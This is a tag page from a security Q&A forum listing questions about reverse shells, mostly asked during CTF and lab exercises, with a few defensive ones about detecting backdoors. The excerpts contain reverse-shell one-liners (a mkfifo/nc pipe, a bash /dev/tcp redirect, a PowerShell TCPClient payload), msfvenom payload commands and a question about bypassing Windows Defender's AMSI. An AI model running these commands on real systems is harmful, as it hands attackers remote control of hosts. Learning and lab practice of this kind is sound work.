Questions tagged [reverse-shell]
49 questions
3
votes
1 answer
How do I stabilize a reverse shell in when the attack box is using powershell?
So I've managed to get a version of netcat onto my windows machine and I can run the standard:
nc -lvnp 1234
and this properly connects to the victim's machine, but it's a very fragile connection. Ctrl + C will just drop the connection, tab doesn't…
user248411
- 31
- 1
- 2
3
votes
1 answer
How to detect backdoor/root shells?
Let's assume I'm a user with root access to a machine and I'm a legit user. My machine/server runs Linux. I'm not very familiar with defensive security (I mainly practice offensive). Sometimes, popping shells can be as easy as running some…
ChocolateOverflow
- 3,452
- 4
- 17
- 34
2
votes
1 answer
Reverse Shell for managing unreachable remote computers
In the near future, I will have about 50 remote computers to manage. These will be physical PCs running Debian 11, distributed all over the country. They will automatically perform a special kind of measurement repeatedly, and upload the results…
kol
- 123
- 4
2
votes
0 answers
Why a curl piped bash command works but not the direct command?
So im doing some pentesting in a TryHackme box (Chill Hack) and I've come to some trouble. In this box I have available an input in a website where I can inject commands to the vulnerable system.
This input has filters so I cannot use bash nor…
alex55132
- 23
- 4
2
votes
2 answers
Why is the first step for an attacker to get Reverse Shell after getting RCE?
If someone is having a Remote Code Execution, that means, one can run the commands on the server, then why does he need to get the Reverse Shell?
Even though I can run system commands, then why do I go for Reverse Shell?
I am finding the primary…
AWS Learning
- 31
- 4
2
votes
1 answer
Connect msfvenom reverse shell without metasploit
For most reverse shell here, I can simply use netcat to connect:
nc -nlvp 1234
But for reverse shell created by msfvenom, for example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx
I CANNOT use netcat to…
TJCLK
- 818
- 8
- 23
2
votes
0 answers
Unable to start reverse shell over HTTP
I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.
Locally over TCP:
Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
Target terminal sends an interactive…
NattyP
- 21
- 1
2
votes
1 answer
Bypass AMSI Windows 10
I'm trying to run a powershell reverse shell on windows 10. Anyway everytime it is blocked by Wndows Defender. How can I bypass it?
In a file I store the payload
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);
$stream =…
Maicake
- 497
- 1
- 3
- 13
2
votes
0 answers
Reverse TCP - Bind to a specific port
So, I'm trying to solve a CTF challenge that involves exploiting a remote service. The service doesn't check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flow to my shellcode, the…
Ranganatha Rao
- 121
- 1
1
vote
2 answers
Can pipe | shell | nc > pipe achieve remote shell?
In one of the articles I have came across an exploit of Dell devices that said when you trigger the following line of code (executed somewhere in php) you will get a remote root shell :
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.100 4444…
Patryk
- 157
- 1
- 2
- 7
1
vote
1 answer
Payload uploaded but error : "no session was created"
I'm doing a capture-the-flag challenge (similar to HackTheBox) and I can't figure it out despite looking at many workarounds how to solve my issue.
I did:
nmap --> got port 8080
firefox -> 10.10.40.122:8080 -> got Apache
msf6 use tomcat_mgr_login…
J.erome
- 113
- 4
1
vote
1 answer
Reverse PHP shell exit when netcat listening
My reverse shell is exiting when i lsten it with netcat: here is netcat output:
listening on [any] 5555 ...
connect to [10.9.3.117] from (UNKNOWN) [10.10.47.117] 37602
bash: cannot set terminal process group (873): Inappropriate ioctl for…
Grainbox
- 11
- 1
1
vote
2 answers
Upgrading a reverse shell with stty raw -echo doesn't work
I successfully got a reverse shell:
nc -lnvp 8000 # in Kali
/bin/bash -i >& /dev/tcp/192.168.6.1/8000 0>&1 # in the victim machine
I tried to upgrade it in the standard way:
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw…
user3207874
- 225
- 2
- 11
1
vote
1 answer
Suspicious HTTP Requests in my logs
I'm running a PHP application with a user management system called userspice. It basically allows you to include the userspice PHP file and then control access to a certain PHP page.
As I have seen some spikes in my log management about 404 requests…
Dinn Arbieri
- 11
- 1
- 2
1
vote
0 answers
PHP reverse shell is not responding back
I created a php reverse shell using msfvenom utility like:
msfvenom -p php/meterpreter/reverse_tcp LHOST= LHOST=4444 -f raw > reverse_shell.php
And I created a listener using msfconsole using multi/handler. I uploaded the shell to the target…
Adnan Khan
- 11
- 1